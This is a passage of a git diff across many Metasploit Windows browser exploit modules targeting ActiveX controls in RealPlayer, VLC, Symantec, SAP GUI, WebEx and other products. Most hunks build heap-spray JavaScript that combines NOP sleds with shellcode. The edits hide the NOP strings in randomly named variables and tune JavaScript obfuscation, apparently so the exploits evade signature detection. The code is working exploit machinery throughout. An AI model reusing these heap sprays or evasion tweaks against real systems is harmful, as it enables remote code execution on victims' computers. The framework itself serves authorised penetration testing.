@@ -80,7 +81,8 @@ class MetasploitModule < Msf::Exploit::Remote
 function #{spray_func}() {
   #{var_blocks} = new Array();
   var #{var_shellcode} = unescape("#{shellcode}");
-  var #{var_nopsled} = unescape("#{nop_sled}");
+  var #{randnop} = "#{nop_sled}";
+  var #{var_nopsled} = unescape(#{randnop});
   do { #{var_nopsled} += #{var_nopsled} } while (#{var_nopsled}.length < 8200);
     for (#{var_index}=0; #{var_index} < 19000; #{var_index}++)
       #{var_blocks}[#{var_index}] = #{var_nopsled} + #{var_shellcode};
diff --git a/modules/exploits/windows/browser/realplayer_console.rb b/modules/exploits/windows/browser/realplayer_console.rb
index 102694a41b..4910c924cb 100644
--- a/modules/exploits/windows/browser/realplayer_console.rb
+++ b/modules/exploits/windows/browser/realplayer_console.rb
@@ -78,13 +78,15 @@ class MetasploitModule < Msf::Exploit::Remote
     j_memory     = rand_text_alpha(rand(100) + 1)
     j_counter    = rand_text_alpha(rand(30) + 2)
     j_ret        = rand_text_alpha(rand(100) + 1)
+    randnop      = rand_text_alpha(rand(100) + 1)
 
     # Build out the message
     content = %Q|<html>
 <object classid='clsid:2F542A2E-EDC9-4BF7-8CB1-87C9919F7F93' id='#{racontrol}'></object>
 <script language='javascript'>
 #{j_shellcode} = unescape('#{shellcode}');
-#{j_nops} = unescape('#{nops}');
+#{randnop} = "#{nops}";
+#{j_nops} = unescape(#{randnop});
 #{j_headersize} = 20;
 #{j_slackspace} = #{j_headersize} + #{j_shellcode}.length
 while (#{j_nops}.length < #{j_slackspace}) #{j_nops} += #{j_nops};
diff --git a/modules/exploits/windows/browser/realplayer_qcp.rb b/modules/exploits/windows/browser/realplayer_qcp.rb
index 00a27fdad2..e69a04415b 100644
--- a/modules/exploits/windows/browser/realplayer_qcp.rb
+++ b/modules/exploits/windows/browser/realplayer_qcp.rb
@@ -125,7 +125,7 @@ class MetasploitModule < Msf::Exploit::Remote
     vprint_status("Obfuscating javascript...")
     if datastore['OBFUSCATE']
       spray = Rex::Exploitation::JSObfu.new(spray)
-      spray.obfuscate
+      spray.obfuscate(memory_sensitive: true)
     end
 
     vprint_status("Building html...")
@@ -212,11 +212,13 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def build_spray(mytarget, code)
+    randnop = rand_text_alpha(rand(100) + 1)
     spray = <<-JS
     var heap_obj = new heapLib.ie(0x20000);
 
     var code = unescape("#{code}");
-    var nops = unescape("#{mytarget['Nops']}");
+    var #{randnop} = "#{mytarget['Nops']}";
+    var nops = unescape(#{randnop});
 
     while (nops.length < 0x10000) nops += nops;
     offset = nops.substring(0, 0x7BE0);
diff --git a/modules/exploits/windows/browser/samsung_neti_wiewer_backuptoavi_bof.rb b/modules/exploits/windows/browser/samsung_neti_wiewer_backuptoavi_bof.rb
index 7ecd4c13b4..b7f4f6bdfa 100644
--- a/modules/exploits/windows/browser/samsung_neti_wiewer_backuptoavi_bof.rb
+++ b/modules/exploits/windows/browser/samsung_neti_wiewer_backuptoavi_bof.rb
@@ -102,11 +102,13 @@ class MetasploitModule < Msf::Exploit::Remote
     p = payload.encoded
     js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(my_target.arch))
     js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(my_target.arch))
+    randnop = rand_text_alpha(rand(100) + 1)
 
     js = <<-JS
     var heap_obj = new heapLib.ie(0x20000);
     var code = unescape("#{js_code}");
-    var nops = unescape("#{js_nops}");
+    var #{randnop} = "#{js_nops}";
+    var nops = unescape(#{randnop});
 
     while (nops.length < 0x80000) nops += nops;
     var offset = nops.substring(0, #{my_target['Offset']});
@@ -127,7 +129,7 @@ class MetasploitModule < Msf::Exploit::Remote
     #obfuscate on demand
     if datastore['OBFUSCATE']
       js = ::Rex::Exploitation::JSObfu.new(js)
-      js.obfuscate
+      js.obfuscate(memory_sensitive: true)
     end
 
     bof = Rex::Text.to_unescape("\x0c" * 2048, Rex::Arch.endian(my_target.arch))
diff --git a/modules/exploits/windows/browser/samsung_security_manager_put.rb b/modules/exploits/windows/browser/samsung_security_manager_put.rb
index a38edbc159..dec91875f8 100644
--- a/modules/exploits/windows/browser/samsung_security_manager_put.rb
+++ b/modules/exploits/windows/browser/samsung_security_manager_put.rb
@@ -179,7 +179,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
       if datastore['OBFUSCATE']
         js_content = ::Rex::Exploitation::JSObfu.new(js_content)
-        js_content.obfuscate
+        js_content.obfuscate(memory_sensitive: true)
       end
 
     print_status("Sending javascript...")
@@ -190,9 +190,9 @@ class MetasploitModule < Msf::Exploit::Remote
 
     if datastore['OBFUSCATE']
        js_content = ::Rex::Exploitation::JSObfu.new(js_content)
-       js_content.obfuscate
+       js_content.obfuscate(memory_sensitive: true)
        onlick = ::Rex::Exploitation::JSObfu.new(onlick)
-       onlick.obfuscate
+       onlick.obfuscate(memory_sensitive: true)
     end
 
     # we can bypass Access-Control-Allow-Origin (CORS) in all browsers using iframe since it makes a GET request
diff --git a/modules/exploits/windows/browser/sapgui_saveviewtosessionfile.rb b/modules/exploits/windows/browser/sapgui_saveviewtosessionfile.rb
index db0e324042..f2f470b778 100644
--- a/modules/exploits/windows/browser/sapgui_saveviewtosessionfile.rb
+++ b/modules/exploits/windows/browser/sapgui_saveviewtosessionfile.rb
@@ -75,13 +75,15 @@ class MetasploitModule < Msf::Exploit::Remote
     rand6  = rand_text_alpha(rand(100) + 1)
     rand7  = rand_text_alpha(rand(100) + 1)
     rand8  = rand_text_alpha(rand(100) + 1)
+    randnop = rand_text_alpha(rand(100) + 1)
 
     content = %Q|
     <html>
       <object id='#{vname}' classid='clsid:AFBBE070-7340-11D2-AA6B-00E02924C34E'></object>
       <script language="JavaScript">
         var #{rand1} = unescape('#{shellcode}');
-        var #{rand2} = unescape('#{nops}');
+        var #{randnop} = "#{nops}";
+        var #{rand2} = unescape(#{randnop});
         var #{rand3} = 20;
         var #{rand4} = #{rand3} + #{rand1}.length;
         while (#{rand2}.length < #{rand4}) #{rand2} += #{rand2};
diff --git a/modules/exploits/windows/browser/siemens_solid_edge_selistctrlx.rb b/modules/exploits/windows/browser/siemens_solid_edge_selistctrlx.rb
index c82bbabcd9..2e4959eb94 100644
--- a/modules/exploits/windows/browser/siemens_solid_edge_selistctrlx.rb
+++ b/modules/exploits/windows/browser/siemens_solid_edge_selistctrlx.rb
@@ -134,6 +134,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def ie9_spray(t, p)
     js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(t.arch))
     js_random_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(t.arch))
+    randnop = rand_text_alpha(rand(100) + 1)
 
     js = %Q|
 
@@ -210,7 +211,8 @@ class MetasploitModule < Msf::Exploit::Remote
 
     var heap_obj = new heapLib.ie(0x10000);
     var code = unescape("#{js_code}");
-    var nops = unescape("#{js_random_nops}");
+    var #{randnop} = "#{js_random_nops}";
+    var nops = unescape(#{randnop});
 
     function heap_spray(jutil_base) {
       while (nops.length < 0x80000) nops += nops;
@@ -233,11 +235,13 @@ class MetasploitModule < Msf::Exploit::Remote
   def ie8_spray(t, p)
     js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(t.arch))
     js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(t.arch))
+    randnop = rand_text_alpha(rand(100) + 1)
 
     js = %Q|
     var heap_obj = new heapLib.ie(0x20000);
     var code = unescape("#{js_code}");
-    var nops = unescape("#{js_nops}");
+    var #{randnop} = "#{js_nops}";
+    var nops = unescape(#{randnop});
 
     function rop_chain(jutil_base){
       var arr = [
@@ -308,10 +312,12 @@ class MetasploitModule < Msf::Exploit::Remote
   def ie6_spray(t, p)
     js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(t.arch))
     js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(t.arch))
+    randnop = rand_text_alpha(rand(100) + 1)
 
     js = %Q|
     var heap_obj = new heapLib.ie(0x20000);
-    var nops = unescape("#{js_nops}");
+    var #{randnop} = "#{js_nops}";
+    var nops = unescape(#{randnop});
     var code = unescape("#{js_code}");
 
     function heap_spray() {
@@ -346,7 +352,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     if datastore['OBFUSCATE']
       js = ::Rex::Exploitation::JSObfu.new(js)
-      js.obfuscate
+      js.obfuscate(memory_sensitive: true)
       @heap_spray_fn = js.sym("heap_spray")
     else
       @heap_spray_fn = "heap_spray"
diff --git a/modules/exploits/windows/browser/softartisans_getdrivename.rb b/modules/exploits/windows/browser/softartisans_getdrivename.rb
index 19f85b5b01..5a17be39d8 100644
--- a/modules/exploits/windows/browser/softartisans_getdrivename.rb
+++ b/modules/exploits/windows/browser/softartisans_getdrivename.rb
@@ -75,6 +75,7 @@ class MetasploitModule < Msf::Exploit::Remote
     rand6  = rand_text_alpha(rand(100) + 1)
     rand7  = rand_text_alpha(rand(100) + 1)
     rand8  = rand_text_alpha(rand(100) + 1)
+    randnop = rand_text_alpha(rand(100) + 1)
 
     content = %Q|
   <html>
@@ -83,7 +84,8 @@ class MetasploitModule < Msf::Exploit::Remote
     try {
       var #{vname} = new ActiveXObject('SoftArtisans.FileManager.1');
       var #{rand1} = unescape('#{shellcode}');
-      var #{rand2} = unescape('#{nops}');
+      var #{randnop} = "#{nops}";
+      var #{rand2} = unescape(#{randnop});
       var #{rand3} = 20;
       var #{rand4} = #{rand3} + #{rand1}.length;
       while (#{rand2}.length < #{rand4}) #{rand2} += #{rand2};
diff --git a/modules/exploits/windows/browser/symantec_altirisdeployment_runcmd.rb b/modules/exploits/windows/browser/symantec_altirisdeployment_runcmd.rb
index 56de2ce3d9..9a0b76db44 100644
--- a/modules/exploits/windows/browser/symantec_altirisdeployment_runcmd.rb
+++ b/modules/exploits/windows/browser/symantec_altirisdeployment_runcmd.rb
@@ -93,7 +93,7 @@ class MetasploitModule < Msf::Exploit::Remote
     }
     js = ::Rex::Exploitation::ObfuscateJS.new(js, opts)
     js.update_opts(js_heap_spray.opts)
-    js.obfuscate()
+    js.obfuscate(memory_sensitive: true)
     content = %Q|<html>
 <body>
 <script><!--
diff --git a/modules/exploits/windows/browser/symantec_backupexec_pvcalendar.rb b/modules/exploits/windows/browser/symantec_backupexec_pvcalendar.rb
index ada147f8b6..9df47bd56b 100644
--- a/modules/exploits/windows/browser/symantec_backupexec_pvcalendar.rb
+++ b/modules/exploits/windows/browser/symantec_backupexec_pvcalendar.rb
@@ -81,13 +81,15 @@ class MetasploitModule < Msf::Exploit::Remote
     j_ret        = rand_text_alpha(rand(100) + 1)
     j_junk       = rand_text_alpha(rand(100) + 1)
     j_filename   = rand_text_alpha(rand(16) + 1)
+    randnop      = rand_text_alpha(rand(100) + 1)
 
     # Build out the message
     content = %Q|<html>
 <object classid='clsid:22ACD16F-99EB-11D2-9BB3-00400561D975' id='#{pvcalendar}'></object>
 <script language='javascript'>
 #{j_shellcode} = unescape('#{shellcode}');
-#{j_nops} = unescape('#{nops}');
+#{randnop} = "#{nops}";
+#{j_nops} = unescape(#{randnop});
 #{j_headersize} = 20;
 #{j_slackspace} = #{j_headersize} + #{j_shellcode}.length
 while (#{j_nops}.length < #{j_slackspace}) #{j_nops} += #{j_nops};
diff --git a/modules/exploits/windows/browser/teechart_pro.rb b/modules/exploits/windows/browser/teechart_pro.rb
index fd67c1afa1..a0eb066faf 100644
--- a/modules/exploits/windows/browser/teechart_pro.rb
+++ b/modules/exploits/windows/browser/teechart_pro.rb
@@ -138,11 +138,14 @@ class MetasploitModule < Msf::Exploit::Remote
     obj_name  = rand_text_alpha(rand(100) + 1)
     main_sym  = 'main' #main function name
 
+    randnop = rand_text_alpha(rand(100) + 1)
+
     if my_target.name =~ /IE6/ or my_target.name =~ /IE7/
       js = <<-EOS
 var sc = unescape('#{sc}');
 
-var nops = unescape('%u0c0c%u0c0c');
+var #{randnop} = "%u0c0c%u0c0c";
+var nops = unescape(#{randnop});
 var offset = 20;
 var s = offset + sc.length;
 while(nops.length < s) {
@@ -233,7 +236,7 @@ EOS
       #JS obfuscation on demand
       if datastore['OBFUSCATE']
         js = ::Rex::Exploitation::JSObfu.new(js)
-        js.obfuscate
+        js.obfuscate(memory_sensitive: true)
         main_sym = js.sym('main')
       end
     end
diff --git a/modules/exploits/windows/browser/tom_sawyer_tsgetx71ex552.rb b/modules/exploits/windows/browser/tom_sawyer_tsgetx71ex552.rb
index 8dbb835630..c1e75fe3a0 100644
--- a/modules/exploits/windows/browser/tom_sawyer_tsgetx71ex552.rb
+++ b/modules/exploits/windows/browser/tom_sawyer_tsgetx71ex552.rb
@@ -191,6 +191,8 @@ class MetasploitModule < Msf::Exploit::Remote
     js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(my_target.arch))
     js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(my_target.arch))
     js_90_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(my_target.arch))
+    randnop = rand_text_alpha(rand(100) + 1)
+    randnop2 = rand_text_alpha(rand(100) + 1)
 
     if my_target['Rop'].nil?
       js_shellcode = "var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);"
@@ -207,8 +209,10 @@ class MetasploitModule < Msf::Exploit::Remote
     js = <<-JS
     var heap_obj = new heapLib.ie(0x20000);
     var code = unescape("#{js_code}");
-    var nops = unescape("#{js_nops}");
-    var nops_90 = unescape("#{js_90_nops}");
+    var #{randnop} = "#{js_nops}";
+    var nops = unescape(#{randnop});
+    var #{randnop2} = "#{js_90_nops}";
+    var nops_90 = unescape(#{randnop2});
 
     while (nops.length < 0x80000) nops += nops;
     while (nops_90.length < 0x80000) nops_90 += nops_90;
@@ -232,7 +236,7 @@ class MetasploitModule < Msf::Exploit::Remote
     #obfuscate on demand
     if datastore['OBFUSCATE']
       js = ::Rex::Exploitation::JSObfu.new(js)
-      js.obfuscate
+      js.obfuscate(memory_sensitive: true)
     end
 
     html = <<-EOS
diff --git a/modules/exploits/windows/browser/trendmicro_extsetowner.rb b/modules/exploits/windows/browser/trendmicro_extsetowner.rb
index a72b9903b1..209344bb95 100644
--- a/modules/exploits/windows/browser/trendmicro_extsetowner.rb
+++ b/modules/exploits/windows/browser/trendmicro_extsetowner.rb
@@ -107,12 +107,14 @@ class MetasploitModule < Msf::Exploit::Remote
     j_block      = rand_text_alpha(rand(100) + 1)
     j_memory     = rand_text_alpha(rand(100) + 1)
     j_counter    = rand_text_alpha(rand(30) + 2)
+    randnop      = rand_text_alpha(rand(100) + 1)
 
     html = %Q|<html>
 <object classid='clsid:#{clsid}' id='#{ufpbctrl}'></object>
 <script>
 var #{j_shellcode} = unescape('#{shellcode}');
-var #{j_nops} = unescape('#{nops}');
+var #{randnop} = "#{nops}";
+var #{j_nops} = unescape(#{randnop});
 var #{j_headersize} = 20;
 var #{j_slackspace} = #{j_headersize} + #{j_shellcode}.length;
 while (#{j_nops}.length < #{j_slackspace}) #{j_nops} += #{j_nops};
diff --git a/modules/exploits/windows/browser/ultramjcam_openfiledig_bof.rb b/modules/exploits/windows/browser/ultramjcam_openfiledig_bof.rb
index d3fad49432..691c1153dd 100644
--- a/modules/exploits/windows/browser/ultramjcam_openfiledig_bof.rb
+++ b/modules/exploits/windows/browser/ultramjcam_openfiledig_bof.rb
@@ -85,6 +85,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch))
     js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch))
+    randnop = rand_text_alpha(rand(100) + 1)
 
     # Convert the pivot addr (in decimal format) to binary,
     # and then break it down to this printable format:
@@ -98,7 +99,8 @@ class MetasploitModule < Msf::Exploit::Remote
     js = <<-JS
     var heap_obj = new heapLib.ie(0x20000);
     var code = unescape("#{js_code}");
-    var nops = unescape("#{js_nops}");
+    var #{randnop} = "#{js_nops}";
+    var nops = unescape(#{randnop});
 
     while (nops.length < 0x80000) nops += nops;
     var offset = nops.substring(0, #{my_target['Offset']});
diff --git a/modules/exploits/windows/browser/ultraoffice_httpupload.rb b/modules/exploits/windows/browser/ultraoffice_httpupload.rb
index 92d751adbe..49a3f76d49 100644
--- a/modules/exploits/windows/browser/ultraoffice_httpupload.rb
+++ b/modules/exploits/windows/browser/ultraoffice_httpupload.rb
@@ -112,7 +112,7 @@ obj.HttpUpload(arg1, arg2, sploit);
       }
     }
     js = ::Rex::Exploitation::ObfuscateJS.new(js, opts)
-    js.obfuscate()
+    js.obfuscate(memory_sensitive: true)
 
     # Build the final HTML
     content = %Q|<html>
diff --git a/modules/exploits/windows/browser/viscom_movieplayer_drawtext.rb b/modules/exploits/windows/browser/viscom_movieplayer_drawtext.rb
index 478cc36868..e447c7f74d 100644
--- a/modules/exploits/windows/browser/viscom_movieplayer_drawtext.rb
+++ b/modules/exploits/windows/browser/viscom_movieplayer_drawtext.rb
@@ -146,11 +146,14 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # Payload in JS format
     code = Rex::Text.to_unescape(code)
+    randnop = rand_text_alpha(rand(100) + 1)
+    js_nops = Rex::Text.to_unescape("\x0c"*4)
 
     spray = <<-JS
     var heap_lib = new heapLib.ie(0x20000);
     var code = unescape("#{code}");
-    var nops = unescape("%u0c0c%u0c0c");
+    var #{randnop} = "#{js_nops}";
+    var nops = unescape(#{randnop});
 
     while (nops.length < 0x2000) nops += nops;
     var offset = nops.substring(0, 0x800-0x20);
@@ -172,7 +175,7 @@ class MetasploitModule < Msf::Exploit::Remote
     # Obfuscate on demand
     if datastore['OBFUSCATE']
       js = ::Rex::Exploitation::JSObfu.new(js)
-      js.obfuscate
+      js.obfuscate(memory_sensitive: true)
     end
 
     # Randomize the javascript variable names
diff --git a/modules/exploits/windows/browser/vlc_amv.rb b/modules/exploits/windows/browser/vlc_amv.rb
index b685126fc1..af06bb3e3d 100644
--- a/modules/exploits/windows/browser/vlc_amv.rb
+++ b/modules/exploits/windows/browser/vlc_amv.rb
@@ -159,12 +159,14 @@ class MetasploitModule < Msf::Exploit::Remote
       code = Rex::Text.to_unescape(payload.encoded, arch)
       pivot   = Rex::Text.to_unescape([my_target['TargetAddr']].pack('V*'), arch)
     end
+    randnop = rand_text_alpha(rand(100) + 1)
 
     #First spray overwrites 0x0c0c0c0c with our payload
     spray_1 = <<-JS
     var heap_obj = new heapLib.ie(0x20000);
     var code = unescape("#{code}");
-    var nops = unescape("#{nops}");
+    var #{randnop} = "#{nops}";
+    var nops = unescape(#{randnop});
 
     while (nops.length < 0x1000) nops += nops;
     var offset = nops.substring(0, 0x600-0x20);
@@ -183,7 +185,7 @@ class MetasploitModule < Msf::Exploit::Remote
     #An invalid pointer gets passed on to libdirectx_plugin!vlc_entry_license__1_1_0g,
     #which requires us to fill up the memory as high as 0x303234ca
     spray_2 = <<-JS
-    var padding = unescape("#{nops}");
+    var padding = unescape(#{randnop});
     var pivot = unescape("#{pivot}");
 
     while (padding.length < 0x20000) padding += padding;
@@ -204,7 +206,7 @@ class MetasploitModule < Msf::Exploit::Remote
     #obfuscate on demand
     if datastore['OBFUSCATE']
       js = ::Rex::Exploitation::JSObfu.new(js)
-      js.obfuscate
+      js.obfuscate(memory_sensitive: true)
     end
 
     #Value for the 'Src' parameter of our ActiveX control
diff --git a/modules/exploits/windows/browser/vlc_mms_bof.rb b/modules/exploits/windows/browser/vlc_mms_bof.rb
index ef0153a7de..758c4f7be9 100644
--- a/modules/exploits/windows/browser/vlc_mms_bof.rb
+++ b/modules/exploits/windows/browser/vlc_mms_bof.rb
@@ -124,12 +124,14 @@ class MetasploitModule < Msf::Exploit::Remote
     arch = Rex::Arch.endian(my_target.arch)
     nops = Rex::Text.to_unescape("\x0c\x0c\x0c\x0c", arch)
     code = Rex::Text.to_unescape(payload.encoded, arch)
+    randnop = rand_text_alpha(rand(100) + 1)
 
     # Spray overwrites 0x30303030 with our payload
     spray = <<-JS
     var heap_obj = new heapLib.ie(0x20000);
     var code = unescape("#{code}");
-    var nops = unescape("#{nops}");
+    var #{randnop} = "#{nops}";
+    var nops = unescape(#{randnop});
 
     while (nops.length < 0x80000) nops += nops;
     var offset = nops.substring(0, #{my_target['OffsetShell']});
@@ -150,7 +152,7 @@ class MetasploitModule < Msf::Exploit::Remote
     #obfuscate on demand
     if datastore['OBFUSCATE']
       js_spray = ::Rex::Exploitation::JSObfu.new(js_spray)
-      js_spray.obfuscate
+      js_spray.obfuscate(memory_sensitive: true)
     end
 
 
diff --git a/modules/exploits/windows/browser/webex_ucf_newobject.rb b/modules/exploits/windows/browser/webex_ucf_newobject.rb
index 74fb2ee7ef..99efb34b8f 100644
--- a/modules/exploits/windows/browser/webex_ucf_newobject.rb
+++ b/modules/exploits/windows/browser/webex_ucf_newobject.rb
@@ -121,7 +121,7 @@ obj.NewObject(sploit);
       }
     }
     js = ::Rex::Exploitation::ObfuscateJS.new(js, opts)
-    js.obfuscate()
+    js.obfuscate(memory_sensitive: true)
 
     # Build the final HTML
     content = %Q|<html>
diff --git a/modules/exploits/windows/browser/zenworks_helplauncher_exec.rb b/modules/exploits/windows/browser/zenworks_helplauncher_exec.rb
index 1c21607238..3b02b3281d 100644
--- a/modules/exploits/windows/browser/zenworks_helplauncher_exec.rb
+++ b/modules/exploits/windows/browser/zenworks_helplauncher_exec.rb
@@ -141,7 +141,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     if datastore['OBFUSCATE']
       js = ::Rex::Exploitation::JSObfu.new(js)
-      js.obfuscate
+      js.obfuscate(memory_sensitive: true)
     end
 
     html = <<-EOS